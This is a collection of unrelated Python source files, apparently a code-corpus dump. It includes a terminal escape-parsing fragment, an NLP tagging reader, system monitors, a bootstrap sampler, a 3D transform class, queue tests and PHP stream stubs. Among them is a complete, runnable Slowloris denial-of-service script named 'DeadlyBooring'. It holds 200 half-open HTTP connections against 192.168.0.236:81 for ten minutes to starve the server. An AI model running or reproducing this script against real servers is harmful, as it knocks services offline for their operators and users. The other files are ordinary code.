state = cap1.control_data_start_state
next_state = None
context.params = []
for c in v:
next_state = state.handle(context, c)
if not next_state or state.get_cap(context.params):
break
print 'next state:', c, next_state.next_states
state = next_state
print state.cap_name, context.params
print 'matched cap:', state.get_cap(context.params), state.next_states
# try_parse('\x1B[10;15H')
# try_parse('\x1B[1;2H')
# try_parse('\x1B[10;15R')
# try_parse('\x1B[1;4R')
# try_parse('^H')
# try_parse('^H100')
# try_parse('^100H100')
# try_parse('\x1B]0;')
# try_parse('\x1B[97m')
# try_parse('\x1B[1;34m')
try_parse('\x1B[?1h\x1B=\x1B')
try_parse('\x1B[?1034h\x1B=\x1B')
|
413491
|
import collections
import numpy as np
from glob import glob
from collections import defaultdict
def _split_tags(tag):
res = []
# t1|t2|t3-t4|t5|t6
# to t1-t4, t1-t5, t1-t6, t2-t4, t2-t5, t2-t6, t3-t4, t3-t5, t3-t6
tags = tag.split('-')
assert(len(tags) <= 2), tag + ' has more than 2 parts'
if len(tags) == 1:
return tags[0].split('|')
t1s = tags[0].split('|')
t2s = tags[1].split('|')
for t1 in t1s:
for t2 in t2s:
t = t1+'-'+t2
_fill_dicts(None, t)
res.append(t)
return res
def _atomize(seq):
res = []
r = [[]]
for item in seq:
tags = _split_tags(item[1])
r *= len(tags)
for t in tags:
for seq in r:
seq.append((item[0], t))
res += r
return res
def _merge(parsed):
merged = []
for seq in parsed:
merged += seq
return merged
class Reader(object):
def __init__(self, atomize=True, split=0.9):
self.START = ('**start**', 'START')
self.END = ('**end**', 'END')
self.PAD = ('**pad**', 'PAD')
self.seed = 42
self.atomize = atomize
self.split = split
self.maxlen = -1
self.ignore_ids = None
def _pad(self, parsed):
buckets = np.percentile([len(s) for s in parsed], range(0, 101, 10))
self.maxlen = int(buckets[-2]) # 90 percentile.
print('pad all sentences to', self.maxlen)
res = []
for seq in parsed:
if len(seq) > self.maxlen:
continue
res.append(seq + [self.PAD] * (self.maxlen - len(seq)))
return res
def _raw_parse(self, docs):
# import re
parsed = []
for doc in docs:
with open(doc, 'r') as f:
seq = [self.START]
for line in f:
# line = line.translate(str.maketrans('', ''), '[]')
line = line.translate({ord(c): None for c in '[]'})
# line = re.sub("\[]", '', line)
# Empty line.
if len(line) == 0:
continue
# Stop sequence line.
if line.strip() == len(line.strip()) * '=':
if len(seq) > 1:
seq.append(self.END); parsed.append(seq)
seq = [self.START]
continue
parts = [item.strip().rsplit('/', 1) for item in line.split()]
for p in parts:
if p[1] == 'CD':
p[0] = '**num**'
seq.append((p[0], p[1]))
# End of sequence.
if p[0] in ['.', '?', '!']:
seq.append(self.END); parsed.append(seq)
seq = [self.START]
continue
if len(seq) > 1:
assert parsed[-1][-1] == self.END and seq[0] == self.START
del parsed[-1][-1]; del seq[0]
seq.append(self.END); parsed[-1].extend(seq)
print('extended', parsed[-1])
return parsed
def _build_vocab(self, padded):
# inside function 1/2
def _text_filtered(_dataset, _vocab, desired_vocab_size=20000):
vocab_ordered = list(_vocab)
# zero based indexing and make room for UUUNKKK
count_cutoff = _vocab[vocab_ordered[desired_vocab_size-2]] # get word by its rank and map to its count
word_to_rank = {}
for i in range(len(vocab_ordered)):
word_to_rank[vocab_ordered[i]] = i
for i in range(len(_dataset)):
example = _dataset[i]
for j in range(len(example)):
try:
if _vocab[example[j][0]] >= count_cutoff and word_to_rank[example[j][0]] < desired_vocab_size:
# we need to ensure that other words below the word on the edge of our desired_vocab size
# are not also on the count cutoff
example[j] = (example[j][0], example[j][1])
else:
example[j] = ('UUUNKKK', example[j][1])
except:
example[j] = ('UUUNKKK', example[j][1])
_dataset[i] = example
return _dataset
# inside function 2/2
def _add_unks(dataset):
vocab = {}
# create a counter for each word
for example in dataset: # [[(word, tag), (word, tag), ..., (word, tag)], [...], ..., [...]]
for word in example:
vocab[word[0]] = 0
for example in dataset: # [[(word, tag), (word, tag), ..., (word, tag)], [...], ..., [...]]
for word in example:
vocab[word[0]] += 1
return _text_filtered(
dataset, collections.OrderedDict(sorted(vocab.items(), key=lambda x: x[1], reverse=True)), 20000)
padded = _add_unks(padded)
# merged = _merge(padded)
words, tags = [], []
for example in padded:
for t in example:
if t[0] not in words:
words.append(t[0])
if t[1] not in tags:
tags.append(t[1])
self.word_to_id = dict(zip(words, range(len(words))))
self.tag_to_id = dict(zip(tags, range(len(tags))))
self.ignore_ids = [self.tag_to_id[self.START[1]],
self.tag_to_id[self.END[1]],
self.tag_to_id[self.PAD[1]]]
def _to_ids(self, padded):
res = []
for seq in padded:
s = []
for item in seq:
s.append((self.word_to_id[item[0]], self.tag_to_id[item[1]]))
res.append(s)
return res
def _split_xy(self, padded):
x = np.zeros([len(padded), self.maxlen], dtype=np.int32)
y = np.zeros([len(padded), self.maxlen], dtype=np.int32)
        mask = np.ones([len(padded), self.maxlen], dtype=bool)  # plain bool; np.bool was removed from NumPy
for i, seq in enumerate(padded):
x[i], y[i] = map(np.asarray, zip(*seq))
for ignored in self.ignore_ids:
mask = np.logical_and(mask, y != ignored)
return x, y, mask
def _get_datasets(self, padded, split):
padded = self._to_ids(padded)
train_size = int(len(padded) * split)
train = padded[:train_size]
test = padded[train_size:]
x_train, y_train, mask_train = self._split_xy(train)
x_test, y_test, mask_test = self._split_xy(test)
return x_train, y_train, mask_train, x_test, y_test, mask_test
def get_data(self, docs):
parsed = self._raw_parse(docs)
if self.atomize:
res = []
for seq in parsed:
res += _atomize(seq)
parsed = res
np.random.seed(self.seed)
np.random.shuffle(parsed)
parsed = self._pad(parsed)
self._build_vocab(parsed)
return self._get_datasets(parsed, self.split)
@staticmethod
def iterator(x, y, mask, batch_size):
"""Iterate on the WSJ data.
"""
epoch_size = (len(x)-1) // batch_size
for i in range(epoch_size):
yield (x[i*batch_size:(i+1)*batch_size], y[i*batch_size:(i+1)*batch_size],
mask[i*batch_size:(i+1)*batch_size])
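# Hedged usage sketch (not part of the original module): it assumes a folder
# of WSJ-style files containing word/TAG tokens; the glob pattern and batch
# size below are illustrative values only.
if __name__ == "__main__":
    docs = glob("wsj/*.pos")
    reader = Reader(atomize=True, split=0.9)
    x_train, y_train, mask_train, x_test, y_test, mask_test = reader.get_data(docs)
    for bx, by, bmask in Reader.iterator(x_train, y_train, mask_train, batch_size=32):
        print(bx.shape, by.shape, bmask.shape)
        break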
|
413512
|
import os, sys, threading, time
CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(CURRENT_DIR, "..", ".."))
import constants
import psutil
import atexit
class Monitor:
def __init__(self):
pass
def warn(self):
pass
def monitor(self):
pass
class CPUMonitor(Monitor):
message = "Your CPU usage is %s percent"
threshold = 80
def __init__(self):
self.running = False
self.warned = False
def warn(self):
truncated = "%d" % (int(self.current_cpu_usage),)
message = CPUMonitor.message % (truncated,)
os.system(constants.DISPLAY_NOTIFICATION % (message,))
def monitor(self):
self.running = True
while self.running:
self.current_cpu_usage = psutil.cpu_percent()
if self.current_cpu_usage > CPUMonitor.threshold:
if not self.warned:
self.warn()
self.warned = True
else:
self.warned = False
time.sleep(1)
def stop(self):
self.running = False
class MemoryMonitor(Monitor):
message = "Your memory usage is %s percent"
threshold = 80
def __init__(self):
self.running = False
self.warned = False
def warn(self):
truncated = "%d" % (int(self.current_mem_usage),)
message = MemoryMonitor.message % (truncated,)
os.system(constants.DISPLAY_NOTIFICATION % (message,))
def monitor(self):
self.running = True
while self.running:
self.current_mem_usage = psutil.virtual_memory()[2]
if self.current_mem_usage > MemoryMonitor.threshold:
if not self.warned:
self.warn()
self.warned = True
else:
self.warned = False
time.sleep(1)
def stop(self):
self.running = False
class TempMonitor(Monitor):
message = "Your temperature usage is %s percent"
threshold = 70
def __init__(self):
self.running = False
self.warned = False
self.temp_file = open("/sys/class/thermal/thermal_zone0/temp", 'r')
def warn(self):
truncated = "%d" % (int(self.current_temp),)
        message = TempMonitor.message % (truncated,)
os.system(constants.DISPLAY_NOTIFICATION % (message,))
def monitor(self):
self.running = True
while self.running:
self.temp_file.seek(0)
temp_str = self.temp_file.read().strip()
self.current_temp = int(temp_str) / 1000
if self.current_temp > TempMonitor.threshold:
if not self.warned:
self.warn()
self.warned = True
else:
self.warned = False
time.sleep(1)
def stop(self):
self.running = False
self.temp_file.close()
monitor_threads = {}
cpu_mon = None
mem_mon = None
temp_mon = None
def start():
global monitor_threads, cpu_mon, mem_mon, temp_mon
if len(monitor_threads) > 0:
return
cpu_mon = CPUMonitor()
mem_mon = MemoryMonitor()
temp_mon = TempMonitor()
monitor_threads["cpu_mon"] = threading.Thread(target=cpu_mon.monitor)
monitor_threads["mem_mon"] = threading.Thread(target=mem_mon.monitor)
monitor_threads["temp_mon"] = threading.Thread(target=temp_mon.monitor)
    for thread in monitor_threads.values():
        thread.daemon = True
        thread.start()
def stop():
global cpu_mon, mem_mon, temp_mon
cpu_mon.stop()
mem_mon.stop()
temp_mon.stop()
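# Hedged usage sketch (not part of the original module): start the monitor
# threads and make sure stop() runs at interpreter exit; `atexit` is imported
# above but never registered, and this shows one way it could be wired up.
# It assumes the same Linux sysfs/psutil environment the module already relies on.
if __name__ == "__main__":
    atexit.register(stop)
    start()
    while True:
        time.sleep(60)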
|
413529
|
import pandas as pd
import numpy as np
def Bootstrap(x1,x2,lag,bslength,verbose=True):
'''
Generate bootstrapped data
Input
-----
x1: array-like, serie-1,
x2: array-like, serie-2,
lag: integer, x2's lag,
bslength: integer, output length,
verbose: boolean,
Output
------
A tuple including 2 bootstrapped series x1,x2
'''
total,dtlen = 0,x1.shape[0]-lag
K,L = [],[]
while total<bslength:
if verbose:
print("Generating random blocks:{}/{}({:.1f}%)".format(total,bslength,(total/bslength*100)),end='\r')
K.append(np.random.randint(dtlen-lag,size=10))
L.append(np.random.geometric(p=0.01, size=10))
total+=L[-1].sum()
K,L = np.concatenate(K),np.concatenate(L)
newx1,newx2 = np.concatenate([x1[lag:]]*(L.max()//dtlen+2)),np.concatenate([x2[:dtlen]]*(L.max()//dtlen+2))
x1output,x2output,total = [],[],0
for Ki,Li in zip(K,L):
if verbose:
print("Generating samples:{}/{}({:.1f}%)".format(total,bslength,(total/bslength*100)),end='\r')
if Li==0:continue
x1output.append(newx1[Ki:Ki+Li])
x2output.append(newx2[Ki:Ki+Li])
total+=Li
if total>=bslength:break
if verbose:
print("Generating samples:{}/{}(100%) ".format(total,bslength))
return np.concatenate(x1output)[:bslength],np.concatenate(x2output)[:bslength]
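# Hedged usage sketch (not part of the original module): draw a bootstrapped
# sample of length 500 from two random series; the series length, lag and
# sample length are illustrative values only.
if __name__ == "__main__":
    series_1 = np.random.randn(1000)
    series_2 = np.random.randn(1000)
    bs_1, bs_2 = Bootstrap(series_1, series_2, lag=3, bslength=500, verbose=False)
    print(bs_1.shape, bs_2.shape)  # (500,) (500,)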
|
413599
|
from .base import WordSubstitute
from ....data_manager import DataManager
from ....exceptions import WordNotInDictionaryException
from ....tags import TAG_English
import pickle
class HowNetSubstitute(WordSubstitute):
TAGS = { TAG_English }
def __init__(self, k = None):
"""
English Sememe-based word substitute based on OpenHowNet.
`[pdf] <https://arxiv.org/pdf/1901.09957.pdf>`__
Args:
k: Top-k results to return. If k is `None`, all results will be returned.
:Data Requirements: :py:data:`.AttackAssist.HownetSubstituteDict`
:Language: english
"""
with open(DataManager.load("AttackAssist.HownetSubstituteDict"),'rb') as fp:
self.dict=pickle.load(fp)
self.k = k
def substitute(self, word: str, pos: str):
if word not in self.dict or pos not in self.dict[word]:
raise WordNotInDictionaryException()
word_candidate = self.dict[word][pos]
ret = []
for wd in word_candidate:
ret.append((wd, 1))
if self.k is not None:
ret = ret[ : self.k]
return ret
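# Hedged usage sketch (comments only, since this module is imported as part of
# a package): it assumes the AttackAssist.HownetSubstituteDict data has been
# fetched via DataManager, and the word/POS pair below is purely illustrative.
#
#     sub = HowNetSubstitute(k=5)
#     try:
#         candidates = sub.substitute("good", "adj")   # [(word, 1), ...]
#     except WordNotInDictionaryException:
#         candidates = []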
|
413602
|
import numpy as np
from .Transform import *
class TransformObject:
def __init__(self, local=None):
self.local = local if local is not None else Matrix4()
self.updated = True
self.left = WORLD_LEFT.copy()
self.up = WORLD_UP.copy()
self.front = WORLD_FRONT.copy()
self.pos = Float3()
self.rot = Float3()
self.euler_to_quat = QUATERNION_IDENTITY.copy()
self.quat = QUATERNION_IDENTITY.copy()
self.final_rotation = QUATERNION_IDENTITY.copy()
self.scale = Float3(1, 1, 1)
self.prev_pos = Float3()
self.prev_Rot = Float3()
self.prev_quat = QUATERNION_IDENTITY.copy()
self.prev_final_rotation = QUATERNION_IDENTITY.copy()
self.prev_Scale = Float3(1, 1, 1)
self.prev_pos_store = Float3()
self.quaternionMatrix = Matrix4()
self.eulerMatrix = Matrix4()
self.rotationMatrix = Matrix4()
self.matrix = Matrix4()
self.inverse_matrix = Matrix4()
self.prev_matrix = Matrix4()
self.prev_inverse_matrix = Matrix4()
self.update_transform(True)
def reset_transform(self):
self.updated = True
self.set_pos(Float3())
self.set_rotation(Float3())
self.set_quaternion(QUATERNION_IDENTITY)
self.set_final_rotation(QUATERNION_IDENTITY)
self.set_scale(Float3(1, 1, 1))
self.update_transform(True)
def clone(self, other_transform):
self.set_pos(other_transform.get_pos())
self.set_rotation(other_transform.get_rotation())
self.set_quaternion(other_transform.get_quaternion())
self.set_final_rotation(other_transform.get_final_rotation())
self.set_scale(other_transform.get_scale())
self.update_transform(True)
# Translate
def get_pos(self):
return self.pos
def get_prev_pos(self):
return self.prev_pos_store
def get_pos_x(self):
return self.pos[0]
def get_pos_y(self):
return self.pos[1]
def get_pos_z(self):
return self.pos[2]
def set_pos(self, pos):
self.pos[...] = pos
def set_prev_pos(self, prev_pos):
self.prev_pos[...] = prev_pos
def set_pos_x(self, x):
self.pos[0] = x
def set_pos_y(self, y):
self.pos[1] = y
def set_pos_z(self, z):
self.pos[2] = z
def move(self, pos):
self.pos[...] = self.pos + pos
def move_front(self, pos):
self.pos[...] = self.pos + self.front * pos
def move_left(self, pos):
self.pos[...] = self.pos + self.left * pos
def move_up(self, pos):
self.pos[...] = self.pos + self.up * pos
def move_x(self, pos_x):
self.pos[0] += pos_x
def move_y(self, pos_y):
self.pos[1] += pos_y
def move_z(self, pos_z):
self.pos[2] += pos_z
# Rotation
def get_rotation(self):
return self.rot
def get_pitch(self):
return self.rot[0]
def get_yaw(self):
return self.rot[1]
def get_roll(self):
return self.rot[2]
def set_rotation(self, rot):
self.rot[...] = rot
def set_pitch(self, pitch):
if pitch > TWO_PI or pitch < 0.0:
pitch %= TWO_PI
self.rot[0] = pitch
def set_yaw(self, yaw):
if yaw > TWO_PI or yaw < 0.0:
yaw %= TWO_PI
self.rot[1] = yaw
def set_roll(self, roll):
if roll > TWO_PI or roll < 0.0:
roll %= TWO_PI
self.rot[2] = roll
def rotation(self, rot):
self.rotation_pitch(rot[0])
self.rotation_yaw(rot[1])
self.rotation_roll(rot[2])
def rotation_pitch(self, delta=0.0):
self.rot[0] += delta
if self.rot[0] > TWO_PI or self.rot[0] < 0.0:
self.rot[0] %= TWO_PI
def rotation_yaw(self, delta=0.0):
self.rot[1] += delta
if self.rot[1] > TWO_PI or self.rot[1] < 0.0:
self.rot[1] %= TWO_PI
def rotation_roll(self, delta=0.0):
self.rot[2] += delta
if self.rot[2] > TWO_PI or self.rot[2] < 0.0:
self.rot[2] %= TWO_PI
# Quaternion
def get_final_rotation(self):
return self.final_rotation
def set_final_rotation(self, quat):
self.final_rotation[...] = quat
def get_quaternion(self):
return self.quat
def set_quaternion(self, quat):
self.quat[...] = quat
def axis_rotation(self, axis, radian):
self.multiply_quaternion(axis_rotation(axis, radian))
def multiply_quaternion(self, quat):
self.quat[...] = muliply_quaternion(quat, self.quat)
def normalize_quaternion(self):
self.quat[...] = normalize(self.quat)
def euler_to_quaternion(self):
euler_to_quaternion(*self.rot, self.quat)
# Scale
def get_scale(self):
return self.scale
def get_scale_x(self):
return self.scale[0]
def get_scale_y(self):
return self.scale[1]
def get_scale_z(self):
return self.scale[2]
def set_scale(self, scale):
self.scale[...] = scale
def set_scale_x(self, x):
self.scale[0] = x
def set_scale_y(self, y):
self.scale[1] = y
def set_scale_z(self, z):
self.scale[2] = z
def scale_xyz(self, scale):
self.scale_x(scale[0])
self.scale_y(scale[1])
self.scale_z(scale[2])
def scale_x(self, x):
self.scale[0] += x
def scale_y(self, y):
self.scale[1] += y
def scale_z(self, z):
self.scale[2] += z
def scaling(self, scale):
self.scale[...] = self.scale + scale
def matrix_to_vectors(self):
matrix_to_vectors(self.rotationMatrix, self.left, self.up, self.front, do_normalize=True)
# update Transform
def update_transform(self, update_inverse_matrix=False, force_update=False):
prev_updated = self.updated
self.updated = False
rotation_update = False
if any(self.prev_pos != self.pos) or force_update:
self.prev_pos_store[...] = self.prev_pos
self.prev_pos[...] = self.pos
self.updated = True
# Quaternion Rotation
if any(self.prev_quat != self.quat) or force_update:
self.prev_quat[...] = self.quat
self.updated = True
rotation_update = True
quaternion_to_matrix(self.quat, self.quaternionMatrix)
        # Euler Rotation
if any(self.prev_Rot != self.rot) or force_update:
self.prev_Rot[...] = self.rot
self.updated = True
rotation_update = True
matrix_rotation(self.eulerMatrix, *self.rot)
if rotation_update:
self.rotationMatrix[...] = np.dot(self.eulerMatrix, self.quaternionMatrix)
self.matrix_to_vectors()
if any(self.prev_Scale != self.scale) or force_update:
self.prev_Scale[...] = self.scale
self.updated = True
if prev_updated or self.updated:
self.prev_matrix[...] = self.matrix
if update_inverse_matrix:
self.prev_inverse_matrix[...] = self.inverse_matrix
if self.updated:
self.matrix[...] = self.local
transform_matrix(self.matrix, self.pos, self.rotationMatrix, self.scale)
if update_inverse_matrix:
# self.inverse_matrix[...] = np.linalg.inv(self.matrix)
self.inverse_matrix[...] = self.local
inverse_transform_matrix(self.inverse_matrix, self.pos, self.rotationMatrix, self.scale)
return self.updated
def get_transform_infos(self):
text = "\tPosition : " + " ".join(["%2.2f" % i for i in self.pos])
text += "\n\tRotation : " + " ".join(["%2.2f" % i for i in self.rot])
text += "\n\tFront : " + " ".join(["%2.2f" % i for i in self.front])
text += "\n\tLeft : " + " ".join(["%2.2f" % i for i in self.left])
text += "\n\tUp : " + " ".join(["%2.2f" % i for i in self.up])
text += "\n\tMatrix"
text += "\n\t" + " ".join(["%2.2f" % i for i in self.matrix[0, :]])
text += "\n\t" + " ".join(["%2.2f" % i for i in self.matrix[1, :]])
text += "\n\t" + " ".join(["%2.2f" % i for i in self.matrix[2, :]])
text += "\n\t" + " ".join(["%2.2f" % i for i in self.matrix[3, :]])
return text
|
413643
|
from winton_kafka_streams.state.factory.store_factory import StoreFactory
def create(name: str) -> StoreFactory:
# TODO replace this Java-esque factory with a Pythonic DSL as part of the other work on a Streams DSL
return StoreFactory(name)
|
413683
|
from arg_parser import lago_args
lago_args()
from arg_parser import UserArgs
from attribute_expert.model import AttributeExpert
from dataset_handler.data_loader import DataLoader
from utils import ml_utils
def main():
print("###################################")
print("#####Main Of Attributes Expert#####")
print("###################################")
# Get Prepared Data
data_loader = DataLoader(UserArgs.test_mode)
# remove samples from train set (hold-out set)
if not UserArgs.test_mode:
with ml_utils.temporary_random_seed(0):
import numpy as np
n_indexes = np.array([], dtype=int)
for class_idx in data_loader.train_classes:
indices = np.where(data_loader.Y_train == class_idx)[0]
if class_idx in data_loader.ms_classes:
# get rid of 1/5 of data for ms class
value = int(np.floor((4 / 5) * len(indices)))
else:
# get rid of 1/2 of data for fs class
value = int(np.floor((1 / 2) * len(indices)))
n_indexes = np.append(n_indexes,
np.random.choice(indices, value, replace=False))
data_loader.Y_train = data_loader.Y_train[n_indexes]
data_loader.X_train = data_loader.X_train[n_indexes, :]
data_loader.Y_train_oh = data_loader.Y_train_oh[n_indexes, :]
data_loader.Attributes_train = data_loader.Attributes_train[n_indexes, :]
print(data_loader.X_train.shape)
print(data_loader.Y_train.shape)
print(data_loader.Attributes_train.shape)
# Attribute Expert
att_model_name = UserArgs.att_model_name
    att_model_variant = UserArgs.att_model_variant
    attribute_expert_model = AttributeExpert(att_model_name, att_model_variant,
data_loader.input_dim, data_loader.categories_dim,
data_loader.attributes_dim,
data_loader.class_descriptions_crossval,
data_loader.attributes_groups_ranges_ids)
attribute_expert_model.compile_model(data_loader.train_classes)
attribute_expert_model.model.summary()
# train model
attribute_expert_model.fit_model(data_loader.X_train, data_loader.Y_train_oh,
data_loader.Attributes_train,
data_loader.X_val, data_loader.Y_val_oh,
data_loader.Attributes_val, data_loader.eval_params)
# Load best model
attribute_expert_model.load_best_model(with_hp_ext=True)
# Evaluate model
attribute_expert_model.evaluate_and_save_metrics(data_loader.train_data,
data_loader.val_data,
data_loader.test_data,
data_loader.test_eval_params,
plot_thresh=False,
should_save_predictions=False,
should_save_metrics=False)
main()
|
413693
|
import os
import sys
sys.path.append(os.path.split(os.path.realpath(__file__))[0])
from lightnlp.sp import TDP
tdp_model = TDP()
train_path = '../data/tdp/train.sample.txt'
dev_path = '../data/tdp/dev.txt'
vec_path = 'D:/Data/NLP/embedding/english/glove.6B.100d.txt'
tdp_model.train(train_path, dev_path=dev_path, vectors_path=vec_path,save_path='./tdp_saves',
log_dir='E:/Test/tensorboard/')
tdp_model.load('./tdp_saves')
tdp_model.test(dev_path)
from pprint import pprint
pprint(tdp_model.predict('Investors who want to change the required timing should write their representatives '
'in Congress , he added . '))
|
413701
|
set1 = {10, 20, 30, 40, 50}
set2 = {30, 40, 50, 60, 70}
set3 = set1.union(set2)
print(set3)
# set3 = {70, 40, 10, 50, 20, 60, 30}
# set1 and set2 remain unchanged
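# A quick check (illustrative addition): union() returns a new set, so both
# operands keep their original elements.
print(set1 == {10, 20, 30, 40, 50})  # True
print(set2 == {30, 40, 50, 60, 70})  # True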
|
413714
|
import requests
import pandas as pd
from gamestonk_terminal import config_terminal as cfg
def get_ipo_calendar(from_date: str, to_date: str) -> pd.DataFrame:
"""Get IPO calendar
Parameters
----------
from_date : str
from date (%Y-%m-%d) to get IPO calendar
to_date : str
to date (%Y-%m-%d) to get IPO calendar
Returns
-------
pd.DataFrame
Get dataframe with economic calendar events
"""
response = requests.get(
f"https://finnhub.io/api/v1/calendar/ipo?from={from_date}&to={to_date}&token={cfg.API_FINNHUB_KEY}"
)
if response.status_code == 200:
d_data = response.json()
if "ipoCalendar" in d_data:
d_refactor_columns = {
"numberOfShares": "Number of Shares",
"totalSharesValue": "Total Shares Value",
"date": "Date",
"exchange": "Exchange",
"name": "Name",
"price": "Price",
"status": "Status",
}
return pd.DataFrame(d_data["ipoCalendar"]).rename(
columns=d_refactor_columns
)
return pd.DataFrame()
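# Hedged usage sketch (not part of the original module): it assumes a valid
# Finnhub API key is configured in gamestonk_terminal; the date range is
# illustrative only.
if __name__ == "__main__":
    df_ipo = get_ipo_calendar("2021-01-01", "2021-01-31")
    print(df_ipo.head())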
|
413731
|
import socket, random, time, sys
class DeadlyBooring():
def __init__(self, ip, port=80, socketsCount = 200):
self._ip = ip
self._port = port
self._headers = [
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)",
"Accept-Language: en-us,en;q=0.5"
]
self._sockets = [self.newSocket() for _ in range(socketsCount)]
def getMessage(self, message):
return (message + "{} HTTP/1.1\r\n".format(str(random.randint(0, 2000)))).encode("utf-8")
def newSocket(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(4)
s.connect((self._ip, self._port))
s.send(self.getMessage("Get /?"))
for header in self._headers:
s.send(bytes(bytes("{}\r\n".format(header).encode("utf-8"))))
return s
except socket.error as se:
print("Error: "+str(se))
time.sleep(0.5)
return self.newSocket()
def attack(self, timeout=sys.maxsize, sleep=15):
t, i = time.time(), 0
while(time.time() - t < timeout):
for s in self._sockets:
try:
print("Sending request #{}".format(str(i)))
s.send(self.getMessage("X-a: "))
i += 1
except socket.error:
self._sockets.remove(s)
self._sockets.append(self.newSocket())
time.sleep(sleep/len(self._sockets))
if __name__ == "__main__":
dos = DeadlyBooring("192.168.0.236", 81, socketsCount=200)
dos.attack(timeout=60*10)
|
413771
|
import logging
from aiohttp.test_utils import AioHTTPTestCase
from saq.job import Status
from saq.worker import Worker
from saq.web import create_app
from tests.helpers import create_queue, cleanup_queue
logging.getLogger().setLevel(logging.CRITICAL)
async def echo(_ctx, *, a):
return a
functions = [echo]
class TestWorker(AioHTTPTestCase):
async def get_application(self):
self.queue1 = create_queue(name="queue1")
self.queue2 = create_queue(name="queue2")
self.worker = Worker(self.queue1, functions=functions)
return create_app(queues=[self.queue1, self.queue2])
async def asyncTearDown(self):
await cleanup_queue(self.queue1)
await cleanup_queue(self.queue2)
async def test_queues(self):
async with self.client.get("/api/queues") as resp:
self.assertEqual(resp.status, 200)
json = await resp.json()
self.assertEqual(
set(q["name"] for q in json["queues"]), {"queue1", "queue2"}
)
async with self.client.get(f"/api/queues/{self.queue1.name}") as resp:
self.assertEqual(resp.status, 200)
json = await resp.json()
self.assertEqual(json["queue"]["name"], "queue1")
async def test_jobs(self):
job = await self.queue1.enqueue("echo", a=1)
url = f"/api/queues/{self.queue1.name}/jobs/{job.key}"
await self.worker.process()
await job.refresh()
self.assertEqual(job.status, Status.COMPLETE)
async with self.client.get(url) as resp:
self.assertEqual(resp.status, 200)
json = await resp.json()
self.assertEqual(json["job"]["kwargs"], repr({"a": 1}))
self.assertEqual(json["job"]["result"], repr(1))
async with self.client.post(f"{url}/retry") as resp:
self.assertEqual(resp.status, 200)
await job.refresh()
self.assertEqual(job.status, Status.QUEUED)
async with self.client.post(f"{url}/abort") as resp:
self.assertEqual(resp.status, 200)
await job.refresh()
self.assertEqual(job.status, Status.ABORTED)
|
413804
|
from hippy import rpath
from hippy.objects.resources.file_resource import W_FileResource
from hippy.objects.base import W_Root
from hippy.builtin import (
wrap, Optional, FileResourceArg, StreamContextArg)
from hippy.objects.resources.socket_resource import W_SocketResource
from hippy.module.url import urlsplit
def set_socket_blocking():
""" Alias of stream_set_blocking"""
raise NotImplementedError()
def stream_bucket_append():
""" Append bucket to brigade"""
raise NotImplementedError()
def stream_bucket_make_writeable():
""" Return a bucket object from the brigade for operating on"""
raise NotImplementedError()
def stream_bucket_new():
""" Create a new bucket for use on the current stream"""
raise NotImplementedError()
def stream_bucket_prepend():
""" Prepend bucket to brigade"""
raise NotImplementedError()
def stream_context_create():
""" Creates a stream context"""
raise NotImplementedError()
def stream_context_get_default():
""" Retrieve the default stream context"""
raise NotImplementedError()
def stream_context_get_options():
""" Retrieve options for a stream/wrapper/context"""
raise NotImplementedError()
def stream_context_get_params():
""" Retrieves parameters from a context"""
raise NotImplementedError()
def stream_context_set_default():
""" Set the default stream context"""
raise NotImplementedError()
def stream_context_set_option():
""" Sets an option for a stream/wrapper/context"""
raise NotImplementedError()
def stream_context_set_params():
""" Set parameters for a stream/wrapper/context"""
raise NotImplementedError()
def stream_copy_to_stream():
""" Copies data from one stream to another"""
raise NotImplementedError()
def stream_encoding():
""" Set character set for stream encoding"""
raise NotImplementedError()
FILTERS = ['string.rot13', 'string.toupper', 'string.tolower',
'convert.base64-encode', 'convert.base64-decode',
'zlib.deflate', 'zlib.inflate',
'bzip2.compress', 'bzip2.decompress']
@wrap(['interp', FileResourceArg(False), str, Optional(int), Optional(W_Root)])
def stream_filter_append(interp, w_res, filtername, _type=1, w_params=None):
""" Attach a filter to a stream"""
assert isinstance(w_res, W_FileResource)
    if filtername not in FILTERS:
        interp.warn("stream_filter_append(): unable to "
                    "locate filter \"%s\"" % filtername)
if _type == 1:
w_res.read_filters_append(filtername)
w_res.read_filters_params_append(w_params)
elif _type == 2:
w_res.write_filters_append(filtername)
w_res.write_filters_params_append(w_params)
elif _type == 3:
w_res.read_filters_append(filtername)
w_res.read_filters_params_append(w_params)
w_res.write_filters_append(filtername)
w_res.write_filters_params_append(w_params)
return w_res
def stream_filter_prepend():
""" Attach a filter to a stream"""
raise NotImplementedError()
def stream_filter_register():
""" Register a user defined stream filter"""
raise NotImplementedError()
def stream_filter_remove():
""" Remove a filter from a stream"""
raise NotImplementedError()
@wrap(['interp', FileResourceArg(False), Optional(int), Optional(int)])
def stream_get_contents(interp, w_res, max_length=-1, offset=-1):
""" Reads remainder of a stream into a string"""
assert isinstance(w_res, W_FileResource)
res = w_res.read(-1)
return interp.space.wrap(res)
def stream_get_filters():
""" Retrieve list of registered filters"""
raise NotImplementedError()
def stream_get_line():
""" Gets line from stream resource up to a given delimiter"""
raise NotImplementedError()
@wrap(['interp', FileResourceArg(False)])
def stream_get_meta_data(interp, w_res):
""" Retrieves header/meta data from streams/file pointers"""
return w_res.get_meta_data()
def stream_get_transports():
""" Retrieve list of registered socket transports"""
raise NotImplementedError()
def stream_get_wrappers():
""" Retrieve list of registered streams"""
raise NotImplementedError()
def stream_is_local():
""" Checks if a stream is a local stream"""
raise NotImplementedError()
def stream_notification_callback():
""" A callback function for the notification context paramater"""
raise NotImplementedError()
def stream_register_wrapper():
""" Alias of stream_wrapper_register"""
raise NotImplementedError()
@wrap(['interp', str])
def stream_resolve_include_path(interp, filename):
""" Resolve filename against the include path"""
for path in interp.include_path:
fullpath = rpath.join(path, [filename])
if rpath.exists(fullpath):
return interp.space.wrap(rpath.realpath(fullpath))
return interp.space.w_False
def stream_select():
""" Runs the equivalent of the select() system call
on the given arrays of streams with a
timeout specified by tv_sec and tv_usec"""
raise NotImplementedError()
def stream_set_blocking():
""" Set blocking/non-blocking mode on a stream"""
raise NotImplementedError()
def stream_set_chunk_size():
""" Set the stream chunk size"""
raise NotImplementedError()
def stream_set_read_buffer():
""" Set read file buffering on the given stream"""
raise NotImplementedError()
@wrap(['interp', FileResourceArg(), int, Optional(int)],
